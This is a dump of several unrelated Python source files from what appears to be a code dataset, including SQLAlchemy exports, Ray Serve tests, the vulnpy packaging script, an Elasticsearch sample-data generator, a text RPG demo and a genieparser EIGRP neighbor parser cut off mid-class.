from .sql import except_ # noqa
from .sql import except_all # noqa
from .sql import exists # noqa
from .sql import extract # noqa
from .sql import false # noqa
from .sql import func # noqa
from .sql import funcfilter # noqa
from .sql import insert # noqa
from .sql import intersect # noqa
from .sql import intersect_all # noqa
from .sql import join # noqa
from .sql import lateral # noqa
from .sql import literal # noqa
from .sql import literal_column # noqa
from .sql import modifier # noqa
from .sql import not_ # noqa
from .sql import null # noqa
from .sql import nullsfirst # noqa
from .sql import nullslast # noqa
from .sql import or_ # noqa
from .sql import outerjoin # noqa
from .sql import outparam # noqa
from .sql import over # noqa
from .sql import select # noqa
from .sql import subquery # noqa
from .sql import table # noqa
from .sql import tablesample # noqa
from .sql import text # noqa
from .sql import true # noqa
from .sql import tuple_ # noqa
from .sql import type_coerce # noqa
from .sql import union # noqa
from .sql import union_all # noqa
from .sql import update # noqa
from .sql import within_group # noqa
from .types import ARRAY # noqa
from .types import BIGINT # noqa
from .types import BigInteger # noqa
from .types import BINARY # noqa
from .types import Binary # noqa
from .types import BLOB # noqa
from .types import BOOLEAN # noqa
from .types import Boolean # noqa
from .types import CHAR # noqa
from .types import CLOB # noqa
from .types import DATE # noqa
from .types import Date # noqa
from .types import DATETIME # noqa
from .types import DateTime # noqa
from .types import DECIMAL # noqa
from .types import Enum # noqa
from .types import FLOAT # noqa
from .types import Float # noqa
from .types import INT # noqa
from .types import INTEGER # noqa
from .types import Integer # noqa
from .types import Interval # noqa
from .types import JSON # noqa
from .types import LargeBinary # noqa
from .types import NCHAR # noqa
from .types import NUMERIC # noqa
from .types import Numeric # noqa
from .types import NVARCHAR # noqa
from .types import PickleType # noqa
from .types import REAL # noqa
from .types import SMALLINT # noqa
from .types import SmallInteger # noqa
from .types import String # noqa
from .types import TEXT # noqa
from .types import Text # noqa
from .types import TIME # noqa
from .types import Time # noqa
from .types import TIMESTAMP # noqa
from .types import TypeDecorator # noqa
from .types import Unicode # noqa
from .types import UnicodeText # noqa
from .types import VARBINARY # noqa
from .types import VARCHAR # noqa
from .engine import create_engine # noqa nosort
from .engine import engine_from_config # noqa nosort
__version__ = "1.3.0b2"
def __go(lcls):
global __all__
from . import events # noqa
from . import util as _sa_util
import inspect as _inspect
__all__ = sorted(
name
for name, obj in lcls.items()
if not (name.startswith("_") or _inspect.ismodule(obj))
)
_sa_util.dependencies.resolve_all("sqlalchemy")
__go(locals())
| 31.664384
| 69
| 0.734372
|
423c0db0e168dafa8212b1dbabcf3bdb7576c0a8
| 7,825
|
py
|
Python
|
python/ray/serve/tests/test_backend_worker.py
|
AIX2/ray
|
91a1ac620012e0c779bf1bbf6983af22675cf26a
|
[
"Apache-2.0"
] | null | null | null |
python/ray/serve/tests/test_backend_worker.py
|
AIX2/ray
|
91a1ac620012e0c779bf1bbf6983af22675cf26a
|
[
"Apache-2.0"
] | null | null | null |
python/ray/serve/tests/test_backend_worker.py
|
AIX2/ray
|
91a1ac620012e0c779bf1bbf6983af22675cf26a
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import pytest
import numpy as np
import ray
from ray import serve
import ray.serve.context as context
from ray.serve.backend_worker import create_backend_replica, wrap_to_ray_error
from ray.serve.controller import TrafficPolicy
from ray.serve.router import Router, RequestMetadata
from ray.serve.config import BackendConfig, BackendMetadata
from ray.serve.exceptions import RayServeException
from ray.serve.utils import get_random_letters
pytestmark = pytest.mark.asyncio
def setup_worker(name,
func_or_class,
init_args=None,
backend_config=BackendConfig(),
controller_name=""):
if init_args is None:
init_args = ()
@ray.remote
class WorkerActor:
def __init__(self):
self.worker = create_backend_replica(func_or_class)(
name, name + ":tag", init_args, backend_config,
controller_name)
def ready(self):
pass
async def handle_request(self, *args, **kwargs):
return await self.worker.handle_request(*args, **kwargs)
def update_config(self, new_config):
return self.worker.update_config(new_config)
worker = WorkerActor.remote()
ray.get(worker.ready.remote())
return worker
async def add_servable_to_router(servable, router, **kwargs):
worker = setup_worker("backend", servable, **kwargs)
await router._update_worker_handles.remote({"backend": [worker]})
await router._update_traffic_policies.remote({
"endpoint": TrafficPolicy({
"backend": 1.0
})
})
if "backend_config" in kwargs:
await router._update_backend_configs.remote({
"backend": kwargs["backend_config"]
})
return worker
def make_request_param(call_method="__call__"):
return RequestMetadata(
get_random_letters(10),
"endpoint",
context.TaskContext.Python,
call_method=call_method)
@pytest.fixture
async def router(serve_instance):
q = ray.remote(Router).remote(serve_instance._controller)
yield q
ray.kill(q)
async def test_runner_wraps_error():
wrapped = wrap_to_ray_error(Exception())
assert isinstance(wrapped, ray.exceptions.RayTaskError)
async def test_servable_function(serve_instance, router):
def echo(request):
return request.args["i"]
_ = await add_servable_to_router(echo, router)
for query in [333, 444, 555]:
query_param = make_request_param()
result = await (await router.assign_request.remote(
query_param, i=query))
assert result == query
async def test_servable_class(serve_instance, router):
class MyAdder:
def __init__(self, inc):
self.increment = inc
def __call__(self, request):
return request.args["i"] + self.increment
_ = await add_servable_to_router(MyAdder, router, init_args=(3, ))
for query in [333, 444, 555]:
query_param = make_request_param()
result = await (await router.assign_request.remote(
query_param, i=query))
assert result == query + 3
async def test_task_runner_custom_method_single(serve_instance, router):
class NonBatcher:
def a(self, _):
return "a"
def b(self, _):
return "b"
_ = await add_servable_to_router(NonBatcher, router)
query_param = make_request_param("a")
a_result = await (await router.assign_request.remote(query_param))
assert a_result == "a"
query_param = make_request_param("b")
b_result = await (await router.assign_request.remote(query_param))
assert b_result == "b"
query_param = make_request_param("non_exist")
with pytest.raises(ray.exceptions.RayTaskError):
await (await router.assign_request.remote(query_param))
async def test_task_runner_custom_method_batch(serve_instance, router):
@serve.accept_batch
class Batcher:
def a(self, requests):
return ["a-{}".format(i) for i in range(len(requests))]
def b(self, requests):
return ["b-{}".format(i) for i in range(len(requests))]
backend_config = BackendConfig(
max_batch_size=4,
batch_wait_timeout=10,
internal_metadata=BackendMetadata(accepts_batches=True))
_ = await add_servable_to_router(
Batcher, router, backend_config=backend_config)
a_query_param = make_request_param("a")
b_query_param = make_request_param("b")
futures = [
await router.assign_request.remote(a_query_param) for _ in range(2)
]
futures += [
await router.assign_request.remote(b_query_param) for _ in range(2)
]
gathered = await asyncio.gather(*futures)
assert set(gathered) == {"a-0", "a-1", "b-0", "b-1"}
async def test_servable_batch_error(serve_instance, router):
@serve.accept_batch
class ErrorBatcher:
def error_different_size(self, requests):
return [""] * (len(requests) + 10)
def error_non_iterable(self, _):
return 42
def return_np_array(self, requests):
return np.array([1] * len(requests)).astype(np.int32)
backend_config = BackendConfig(
max_batch_size=4,
internal_metadata=BackendMetadata(accepts_batches=True))
_ = await add_servable_to_router(
ErrorBatcher, router, backend_config=backend_config)
with pytest.raises(RayServeException, match="doesn't preserve batch size"):
different_size = make_request_param("error_different_size")
await (await router.assign_request.remote(different_size))
with pytest.raises(RayServeException, match="iterable"):
non_iterable = make_request_param("error_non_iterable")
await (await router.assign_request.remote(non_iterable))
np_array = make_request_param("return_np_array")
result_np_value = await (await router.assign_request.remote(np_array))
assert isinstance(result_np_value, np.int32)
async def test_task_runner_perform_batch(serve_instance, router):
def batcher(requests):
batch_size = len(requests)
return [batch_size] * batch_size
config = BackendConfig(
max_batch_size=2,
batch_wait_timeout=10,
internal_metadata=BackendMetadata(accepts_batches=True))
_ = await add_servable_to_router(batcher, router, backend_config=config)
query_param = make_request_param()
my_batch_sizes = await asyncio.gather(*[(
await router.assign_request.remote(query_param)) for _ in range(3)])
assert my_batch_sizes == [2, 2, 1]
async def test_task_runner_perform_async(serve_instance, router):
@ray.remote
class Barrier:
def __init__(self, release_on):
self.release_on = release_on
self.current_waiters = 0
self.event = asyncio.Event()
async def wait(self):
self.current_waiters += 1
if self.current_waiters == self.release_on:
self.event.set()
else:
await self.event.wait()
barrier = Barrier.remote(release_on=10)
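    # All 10 concurrent requests block in Barrier.wait() until the 10th
    # arrives, so the test only passes if the backend serves them concurrently.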
async def wait_and_go(*args, **kwargs):
await barrier.wait.remote()
return "done!"
config = BackendConfig(
max_concurrent_queries=10,
internal_metadata=BackendMetadata(is_blocking=False))
_ = await add_servable_to_router(
wait_and_go, router, backend_config=config)
query_param = make_request_param()
done, not_done = await asyncio.wait(
[(await router.assign_request.remote(query_param)) for _ in range(10)],
timeout=10)
assert len(done) == 10
    for item in done:
        assert (await item) == "done!"
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
| 30.447471
| 79
| 0.670671
|
c8f36ee3d8b51d41936d8d2c8d492b691bf0593c
| 243
|
py
|
Python
|
books_api/api/serializers.py
|
Ki6an/Django-REST-API
|
2171777209eb928f886d0e8ad713b02770f51276
|
[
"MIT"
] | null | null | null |
books_api/api/serializers.py
|
Ki6an/Django-REST-API
|
2171777209eb928f886d0e8ad713b02770f51276
|
[
"MIT"
] | null | null | null |
books_api/api/serializers.py
|
Ki6an/Django-REST-API
|
2171777209eb928f886d0e8ad713b02770f51276
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from books.models import Book
class BookSerializer(serializers.ModelSerializer):
class Meta:
model = Book
        fields = ('title', 'subtitle', 'author', 'isbn')  # extend this tuple to expose more fields
| 22.090909
| 81
| 0.695473
|
5db1e25b3f75484a2b2f054ac9bb22e770b71fbd
| 3,079
|
py
|
Python
|
setup.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | null | null | null |
setup.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | null | null | null |
setup.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | null | null | null |
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
try:
with open(os.path.join(here, "README.md")) as f:
README = f.read()
except IOError:
README = ""
trigger_extras = {"PyYAML<6", "lxml>=4.3.1", "mock==3.*"}
aiohttp_extras = {"aiohttp==3.7.*; python_version >= '3.7'"} | trigger_extras
django_extras = {"Django<4"} | trigger_extras
falcon_extras = {"falcon<4", "falcon-multipart==0.2.0"} | trigger_extras
flask_extras = {"Flask<3"} | trigger_extras
fastapi_extras = {
"fastapi<=0.70; python_version >= '3.6'",
"uvicorn[standard]; python_version >= '3.6'",
"python-multipart<1",
} | trigger_extras
gunicorn_max_extras = {
"gunicorn<20.1; python_version < '3.6'",
"gunicorn==20.1.*; python_version >= '3.6'",
}
uwsgi_max_extras = {"uwsgi==2.0.*"}
uwsgi_min_extras = {"uwsgi==2.0.14"}
gunicorn_min_extras = {"gunicorn==0.16.1"}
pyramid_extras = {
"pyramid<2; python_version < '3.6'",
"pyramid<3; python_version >= '3.6'",
"waitress<2.1",
} | trigger_extras
wsgi_extras = trigger_extras
bottle_extras = {"bottle<1"} | trigger_extras
dev_extras = {"WebTest==2.0.*", "tox==3.*"}
all_extras = (
trigger_extras
| aiohttp_extras
| django_extras
| falcon_extras
| flask_extras
| pyramid_extras
| wsgi_extras
| dev_extras
| bottle_extras
| uwsgi_max_extras
| fastapi_extras
| gunicorn_max_extras
)
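# Each framework extra unions its own pins with the shared trigger_extras, so
# e.g. `pip install vulnpy[flask]` resolves Flask plus the common trigger
# dependencies (PyYAML, lxml, mock).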
setup(
name="vulnpy",
version="0.1.0",
description="Purposely-vulnerable functions for application security testing",
long_description=README,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
keywords="security testing",
author="Contrast Security, Inc.",
author_email="python@contrastsecurity.com",
url="https://github.com/Contrast-Security-OSS/vulnpy",
license="MIT",
include_package_data=True,
packages=find_packages("src"),
package_dir={"": "src"},
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*",
extras_require={
"all": all_extras,
"aiohttp": aiohttp_extras,
"django": django_extras,
"falcon": falcon_extras,
"flask": flask_extras,
"fastapi": fastapi_extras,
"pyramid": pyramid_extras,
"bottle": bottle_extras,
"wsgi": wsgi_extras,
"trigger": trigger_extras,
"uwsgi-max": uwsgi_max_extras,
"uwsgi-min": uwsgi_min_extras,
"gunicorn-max": gunicorn_max_extras,
"gunicorn-min": gunicorn_min_extras,
},
)
| 31.10101
| 82
| 0.6291
|
a0646f4e91fbeb3c11650234e95a9fa611d4447c
| 780
|
py
|
Python
|
src/gocept/month/adapter.py
|
gocept/gocept.month
|
a31d285edd631679d22680c432e3419b262ff9c8
|
[
"MIT"
] | null | null | null |
src/gocept/month/adapter.py
|
gocept/gocept.month
|
a31d285edd631679d22680c432e3419b262ff9c8
|
[
"MIT"
] | 3
|
2019-10-28T14:15:55.000Z
|
2021-04-19T11:22:20.000Z
|
src/gocept/month/adapter.py
|
gocept/gocept.month
|
a31d285edd631679d22680c432e3419b262ff9c8
|
[
"MIT"
] | null | null | null |
from gocept.month import Month
def Date(date):
"""Adapter between Date and Month.
>>> from datetime import date
>>> from zope.interface.verify import verifyObject
>>> from gocept.month import IMonth
>>> today = date.today()
>>> verifyObject(IMonth, Date(today))
True
>>> Date(today).month == today.month
True
>>> Date(today).year == today.year
True
>>> Date(date(2005,12,6))
Month 12/2005
>>> str(Date(date(2005,12,6)))
'12/2005'
>>> str(Date(date(2005,12,6)) + 1)
'01/2006'
>>> Date(today) > Month(today.month, today.year-1)
True
>>> Date(today) == Month(today.month, today.year)
True
"""
return Month(date.month, date.year)
def BuiltinStr(date):
return Month.fromString(date)
| 22.941176
| 54
| 0.605128
|
c9dfb33b4297f1333eb927d0cc373cfdef805635
| 4,161
|
py
|
Python
|
IMService/imsservice/src/main/resources/data/generate_es_user_docs.py
|
helenyu18/blue-marlin
|
668985fad1993a682808e271610c1cf2cec6a6f5
|
[
"Apache-2.0"
] | null | null | null |
IMService/imsservice/src/main/resources/data/generate_es_user_docs.py
|
helenyu18/blue-marlin
|
668985fad1993a682808e271610c1cf2cec6a6f5
|
[
"Apache-2.0"
] | null | null | null |
IMService/imsservice/src/main/resources/data/generate_es_user_docs.py
|
helenyu18/blue-marlin
|
668985fad1993a682808e271610c1cf2cec6a6f5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019, Futurewei Technologies
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# * "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import random
from elasticsearch import Elasticsearch
from elasticsearch import helpers
"""
This script generates sample user documents and pushes to elasticsearch.
Each document is called user-doc.
A user-doc contains all the profile driven, location driven and device driven features.
The script generates <num_of_user> number of user-docs.
Each user-doc has both multi-value and single-value features.
The values of these features reflect different activities of the user on a specific day.
For example, "dm" : "mate20-mate10-mate8" shows that the user used 3 different phone models on "2018-01-02".
"2018-01-02" : {
"a" : "4",
"dm" : "mate20-mate10-mate8",
"g" : "g_m",
"ai" : "magazine",
"m" : "cloudFolder-magazinelock",
"ipl" : "7685432-100000-1243278",
"si" : "6-4-1",
"r" : "1243278",
"au" : "_active_30days-wifi_installed_not_activated-shooping-food-travel_installed_not_activated-travel",
"t" : "3G-4G",
"dpc" : "3600_4500",
"pda" : "353",
"pm" : "CPD-CPT"
IMS Service contains the logic to calculate unique number of users that match specific criteria.
"""
es_host = "10.10.10.10"
es_port = 9200
es_index = 'ulp_test_10082019'
es_type = 'doc'
template1 = {
"a": "1-2-3-4",
"g": "g_m-g_f-g_x",
"m": "cloudFolder-magazinelock",
"si": "1-0-3-2-5-4-7-6-9-8",
"r": "100000-1243278-7685432",
"ipl": "100000-1243278-7685432",
"t": "3G-4G",
"dpc": "2500_3500-3600_4500",
"pm": "CPD-CPC-CPT-CPM",
"dm": "mate8-mate10-mate20",
"ai": "game-magazine-movie",
"au": "wifi-wifi_installed_not_activated-_active_30days-life-life_installed_not_activated-shooping-shooping_activated-travel-travel_installed_not_activated-car-car_installed_not_activated-food-food_installed_not_activated",
"pda": "288-354-353"
}
# This generates a list of unique imeis
def generate_imei(size_of_imeis):
imeis = set()
for _ in range(size_of_imeis):
imei = ''
for _ in range(10):
r = random.randint(1, 9)
imei += str(r)
imeis.add(imei)
return list(imeis)
# This generates a random document based on the template
def generate_random_doc_from_template():
new_doc = {}
for key, value in template1.items():
vlist = value.split('-')
sample_size = random.randint(1, len(vlist))
new_value = '-'.join(random.sample(vlist, sample_size))
new_doc[key] = new_value
return new_doc
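# Example: for the template entry "t": "3G-4G", the function above may return
# "3G", "4G" or "4G-3G" -- a random non-empty subset of the '-'-separated values.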
# Generates data for 1 imei
def user_doc_generator(imei):
one_doc = {'_index': es_index, '_type': es_type, 'imei': imei, 'days': {}}
days = ['2018-01-0' + str(dt) for dt in range(1, 8)]
for day in days:
indoc = generate_random_doc_from_template()
one_doc['days'][day] = indoc
return one_doc
if __name__ == "__main__":
es = Elasticsearch([{'host': es_host, 'port': es_port}])
num_of_user = 100
imeis = generate_imei(num_of_user)
actions = [user_doc_generator(imei) for imei in imeis]
helpers.bulk(es, actions)
| 35.262712
| 228
| 0.637106
|
bbfd6451fa1f80bc635734f661d56a4876e31f94
| 184
|
py
|
Python
|
aerende/__init__.py
|
Autophagy/recall
|
1386f2d74b6cb8b3ea52897f00a6e47d8154e3a8
|
[
"MIT"
] | 10
|
2019-01-15T00:37:18.000Z
|
2020-09-01T04:59:26.000Z
|
aerende/__init__.py
|
Autophagy/recall
|
1386f2d74b6cb8b3ea52897f00a6e47d8154e3a8
|
[
"MIT"
] | 1
|
2018-12-22T19:59:03.000Z
|
2019-04-04T14:55:37.000Z
|
aerende/__init__.py
|
Autophagy/recall
|
1386f2d74b6cb8b3ea52897f00a6e47d8154e3a8
|
[
"MIT"
] | 1
|
2021-03-30T13:47:54.000Z
|
2021-03-30T13:47:54.000Z
|
# -*- coding: utf-8 -*-
__title__ = "aerende"
__author__ = "Mika Naylor (Autophagy)"
__license__ = "MIT"
__version__ = (0, 2, 0)
version = "%s.%s.%s" % __version__
title = __title__
| 18.4
| 38
| 0.641304
|
abd268908046dfe13beb09a378149cc953106cc0
| 2,949
|
py
|
Python
|
codes/course7/demo405.py
|
BigShuang/big-shuang-python-introductory-course
|
c4fd1343c4c539567180072c749b68bda7c28075
|
[
"MIT"
] | null | null | null |
codes/course7/demo405.py
|
BigShuang/big-shuang-python-introductory-course
|
c4fd1343c4c539567180072c749b68bda7c28075
|
[
"MIT"
] | null | null | null |
codes/course7/demo405.py
|
BigShuang/big-shuang-python-introductory-course
|
c4fd1343c4c539567180072c749b68bda7c28075
|
[
"MIT"
] | null | null | null |
class Person:
def __init__(self, hp, attack, defence):
self.hp = hp
self.attack = attack
self.defence = defence
def hit(self, other):
damage = self.attack - other.defence
if damage > 0:
other.hp -= damage
def is_alive(self):
return self.hp > 0
class Player(Person):
def __init__(self):
hp, attack, defence = 100, 10, 5
super().__init__(hp, attack, defence)
self.lv = 1
self.base_hp = self.hp
self.exp = [0, 20]
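        # exp holds [current_exp, exp_needed_for_next_level]; the threshold
        # doubles on every level-up (see lv_up below).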
def win(self, enemy):
        exp = enemy.drop_exp()
        self.exp[0] += exp
print("Defeat enemy: %s. Gain exp: %s. Current exp: %s / %s. Left hp: %s" %
(enemy.__class__.__name__, exp, self.exp[0], self.exp[1] ,self.hp))
if self.exp[0] >= self.exp[1]:
self.exp[0] -= self.exp[1]
self.lv_up()
def lv_up(self):
self.exp[1] = self.exp[1] * 2
self.lv += 1
self.base_hp = self.base_hp * 2
self.attack = self.attack * 2
self.defence = self.defence * 2
self.hp = self.base_hp
print("You upgraded, current level: %s, current hp: %s." % (self.lv, self.hp))
def lose(self, enemy):
print("You lost. %s's left hp: %s" % (enemy.__class__.__name__, enemy.hp))
class Enemy(Person):
def __init__(self, base=1):
hp, attack, defence = 50 * base, 10 * base, 5 * base
super().__init__(hp, attack, defence)
self.exp = 10 * base
def drop_exp(self):
return self.exp
class AdvancedEnemy(Enemy):
def hit(self, other):
damage = self.attack
if damage > 0:
other.hp -= damage
def drop_exp(self):
return self.exp * 2
class Boss(Enemy):
def hit(self, other):
damage = self.attack
if damage > 0:
other.hp -= damage
self.hp += damage
def drop_exp(self):
return self.exp * 3
item_map = {
"e": Enemy,
"a": AdvancedEnemy,
"b": Boss,
}
class Game:
def __init__(self):
self.player = Player()
self.running = True
def run(self):
while self.running:
cmd = input("Enter your command:")
cmd = cmd.lower()
if cmd == "s":
pass
else:
self.handle_commands(cmd)
def handle_commands(self, cmd):
for c in cmd:
item_class = item_map[c]
item = item_class()
if isinstance(item, Enemy):
self.fight(item)
def fight(self, enemy):
while True:
self.player.hit(enemy)
if not enemy.is_alive():
self.player.win(enemy)
return
enemy.hit(self.player)
if not self.player.is_alive():
self.player.lose(enemy)
exit()
game = Game()
game.handle_commands("eeab")
| 23.592
| 86
| 0.519159
|
68208583509ae8383f91c28996b67bbe02ec1a4f
| 972
|
py
|
Python
|
src/pymor/tools/frozendict.py
|
JuliaBru/pymor
|
46343b527267213f4279ea36f208b542ab291c4e
|
[
"Unlicense"
] | null | null | null |
src/pymor/tools/frozendict.py
|
JuliaBru/pymor
|
46343b527267213f4279ea36f208b542ab291c4e
|
[
"Unlicense"
] | null | null | null |
src/pymor/tools/frozendict.py
|
JuliaBru/pymor
|
46343b527267213f4279ea36f208b542ab291c4e
|
[
"Unlicense"
] | null | null | null |
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2016 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
# The following implementation is based on
# http://code.activestate.com/recipes/414283-frozen-dictionaries/
class FrozenDict(dict):
"""An immutable dictionary."""
@property
def _blocked_attribute(self):
raise AttributeError('A frozendict cannot be modified.')
__delitem__ = __setitem__ = clear = _blocked_attribute
pop = popitem = setdefault = update = _blocked_attribute
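    # Assigning the property to every mutating method means any attempt to
    # modify the dict raises AttributeError as soon as the method is looked up.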
def __new__(cls, *args, **kwargs):
new = dict.__new__(cls)
dict.__init__(new, *args, **kwargs)
return new
def __init__(self, *args, **kwargs):
pass
def __repr__(self):
return 'FrozenDict({})'.format(dict.__repr__(self))
def __reduce__(self):
return (FrozenDict, (dict(self),))

# ======================================================================
# File: src/genie/libs/parser/iosxr/show_eigrp.py
# Repo: kacann/genieparser  |  License: Apache-2.0
# ======================================================================
''' show_eigrp.py
IOSXR parser for the following commands
* 'show eigrp ipv4 neighbors'
* 'show eigrp ipv4 vrf {vrf} neighbors'
* 'show eigrp ipv6 neighbors'
* 'show eigrp ipv6 vrf {vrf} neighbors'
* 'show eigrp ipv4 neighbors detail'
* 'show eigrp ipv4 vrf {vrf} neighbors detail'
* 'show eigrp ipv6 neighbors detail'
* 'show eigrp ipv6 vrf {vrf} neighbors detail'
'''
# Python
import re
# Metaparser
from genie.metaparser import MetaParser
from genie.metaparser.util.schemaengine import Any
# Libs
from genie.libs.parser.utils.common import Common
class ShowEigrpNeighborsSchema(MetaParser):
''' Schema for:
* 'show eigrp ipv4 neighbors'
* 'show eigrp ipv4 vrf {vrf} neighbors'
* 'show eigrp ipv6 neighbors'
* 'show eigrp ipv6 vrf {vrf} neighbors'
'''
schema = {
'eigrp_instance': {
Any(): {
'vrf': {
Any(): {
'address_family': {
Any(): {
'name': str,
'named_mode': bool,
'eigrp_interface': {
Any(): {
'eigrp_nbr': {
Any(): {
'peer_handle': int,
'hold': int,
'uptime': str,
'q_cnt': int,
'last_seq_number': int,
'srtt': float,
'rto': int, }, },
},
},
},
},
},
},
},
},
}
# =======================================
# Parser for:
# 'show eigrp ipv4 neighbors'
# 'show eigrp ipv4 vrf {vrf} neighbors'
# 'show eigrp ipv6 neighbors'
# 'show eigrp ipv6 vrf {vrf} neighbors'
# =======================================
class ShowEigrpNeighborsSuperParser(ShowEigrpNeighborsSchema):
def cli(self, vrf='', output=None):
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
        r1 = re.compile(r'^(?P<address_family>IPv4|IPv6)\-EIGRP\s+'
                        r'(?:VR\(?(?P<name>\S+)\))?\s*Neighbors\s*for\s*'
                        r'AS\(\s*(?P<as_num>\d+)\)\s*VRF\s*(?P<vrf>\S+)$')
# H Address Interface Hold Uptime SRTT RTO Q Seq
# (sec) (ms) Cnt Num
# 1 10.23.90.3 Gi0/0/0/1.90 13 01:41:56 13 200 0 23
# 0 10.12.90.1 Gi0/0/0/0.90 14 02:55:10 1 200 0 17
# 1 10.23.90.3 Gi0/0/0/1.390 12 01:40:17 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 12 02:52:31 816 4896 0 8
        r2 = re.compile(r'^(?P<peer_handle>\d+) +'
                        r'(?P<nbr_address>\S+) +'
                        r'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
                        r'(?P<hold>\d+) +(?P<uptime>\S+) +'
                        r'(?P<srtt>\d+) +'
                        r'(?P<rto>\d+) +'
                        r'(?P<q_cnt>\d+) +'
                        r'(?P<last_seq_number>\d+)$')
# H Address Interface Hold Uptime SRTT RTO Q Seq
# (sec) (ms) Cnt Num
# 1 Link Local Address: Gi0/0/0/1.90 12 01:36:14 11 200 0 28
        r3 = re.compile(r'^(?P<peer_handle>\d+) +Link\s+Local\s+Address: +'
                        r'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
                        r'(?P<hold>\d+) +(?P<uptime>\S+) +(?P<srtt>\d+) +'
                        r'(?P<rto>\d+) +(?P<q_cnt>\d+) +'
                        r'(?P<last_seq_number>\d+)$')
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
r4 = re.compile(r'^(?P<nbr_address>\S+)$')
parsed_dict = {}
for line in output.splitlines():
line = line.strip()
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
result = r1.match(line)
if result:
group = result.groupdict()
name = group['name']
named_mode = True if name else False
address_family = group['address_family'].lower()
eigrp_instance = group['as_num']
vrf = group['vrf']
continue
# 1 10.23.90.3 Gi0/0/0/1.90 13 01:41:56 13 200 0 23
# 0 10.12.90.1 Gi0/0/0/0.90 14 02:55:10 1 200 0 17
# 1 10.23.90.3 Gi0/0/0/1.390 12 01:40:17 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 12 02:52:31 816 4896 0 8
result = r2.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = int(group['peer_handle'])
ip_dict['hold'] = int(group['hold'])
ip_dict['uptime'] = group['uptime']
ip_dict['srtt'] = float(group['srtt'])/1000
ip_dict['rto'] = int(group['rto'])
ip_dict['q_cnt'] = int(group['q_cnt'])
ip_dict['last_seq_number'] = int(group['last_seq_number'])
continue
# 1 Link Local Address: Gi0/0/0/1.90 12 01:36:14 11 200 0 28
# 0 Link Local Address: Gi0/0/0/0.90 11 02:30:16 1 200 0 23
result = r3.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
peer_handle = int(group['peer_handle'])
hold = int(group['hold'])
uptime = group['uptime']
srtt = float(group['srtt'])/1000
rto = int(group['rto'])
q_cnt = int(group['q_cnt'])
last_seq_number = int(group['last_seq_number'])
continue
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
result = r4.match(line)
if result:
group = result.groupdict()
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = peer_handle
ip_dict['hold'] = hold
ip_dict['uptime'] = uptime
ip_dict['srtt'] = srtt
ip_dict['rto'] = rto
ip_dict['q_cnt'] = q_cnt
ip_dict['last_seq_number'] = last_seq_number
continue
return parsed_dict
class ShowEigrpIpv4Neighbors(ShowEigrpNeighborsSuperParser,
ShowEigrpNeighborsSchema):
